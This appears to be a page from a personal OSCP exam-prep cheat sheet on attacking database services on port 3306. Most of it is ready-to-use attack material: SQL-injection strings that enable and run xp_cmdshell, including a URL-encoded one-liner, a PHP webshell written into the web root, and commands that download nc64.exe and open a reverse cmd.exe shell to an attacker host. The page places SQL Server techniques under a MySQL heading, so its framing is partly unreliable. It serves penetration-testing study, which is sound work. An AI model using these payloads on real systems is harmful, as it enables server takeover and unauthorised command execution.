> For the complete documentation index, see [llms.txt](https://personal-archive.gitbook.io/oscp-exam-prep/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://personal-archive.gitbook.io/oscp-exam-prep/commons/service-enumeration/mysql-3306.md).

# MYSQL (3306)

## 1. Basics

### Scanning

<pre data-overflow="wrap"><code><strong>sudo nmap -sV -p 3306 --script mysql-audit,mysql-databases,mysql-dump-hashes,mysql-empty-password,mysql-enum,mysql-info,mysql-query,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 &#x3C;IP>
</strong></code></pre>

### Initiate connection

```
mysql -h <IP> -u <username> -p <pass> [-P <port>]
sqsh -S <IP> -U <username> -P <password> -D <database>

For windows sql instances
impacket-mssqlclient <domain>/<compromised username>:<password>@<IP> -windows-auth
```

## 2. Reverse Shell

```
1. Initiate Connection with either mysql or sqsh
    # In sqsh, you need to use GO after writing the query to send it
Do one by one each command:

# Get users that can run xp_cmdshell
    Use master
    EXEC sp_helprotect 'xp_cmdshell'

# Check if xp_cmdshell is enabled
    SELECT * FROM sys.configurations WHERE name = 'xp_cmdshell';

# This turns on advanced options and is needed to configure xp_cmdshell
    sp_configure 'show advanced options', '1'
    RECONFIGURE

# This enables xp_cmdshell
    sp_configure 'xp_cmdshell', '1'
    RECONFIGURE
    EXEC master..xp_cmdshell 'whoami'
```

Manual Code Execution:

{% code overflow="wrap" %}

```
Steps to enable `xp_cmdshell`
    '; EXEC sp_configure "show advanced options", 1; -- //
    '; RECONFIGURE; -- //
    '; EXEC sp_configure "xp_cmdshell", 1; -- //
    '; RECONFIGURE; -- //
        
    '; EXEC xp_cmdshell "whoami"; -- //

Oneliner
'; EXEC sp_configure "show advanced options", 1; RECONFIGURE; EXEC sp_configure "xp_cmdshell", 1; RECONFIGURE; EXEC xp_cmdshell "whoami"; -- //

URL encoded oneliner
%27%3B%20EXEC%20sp%5Fconfigure%20%22show%20advanced%20options%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20sp%5Fconfigure%20%22xp%5Fcmdshell%22%2C%201%3B%20RECONFIGURE%3B%20EXEC%20xp%5Fcmdshell%20%22whoami%22%3B%20%2D%2D%20%2F%2F
```

{% endcode %}

Payload Example:

{% code overflow="wrap" %}

```
Insert webshell into web root directory - 
    "<?php system($_GET['cmd']);?>", null, null, null INTO OUTFILE "/web/root/directory/webshell.php"
    
Initiating reverse shell with nc64.exe via injected webshell - 
    curl http://<IP>/nc64.exe -o c:/windows/temp/nc64.exe
    c:/windows/temp/nc64.exe -e cmd.exe <IP> <port>
```

{% endcode %}
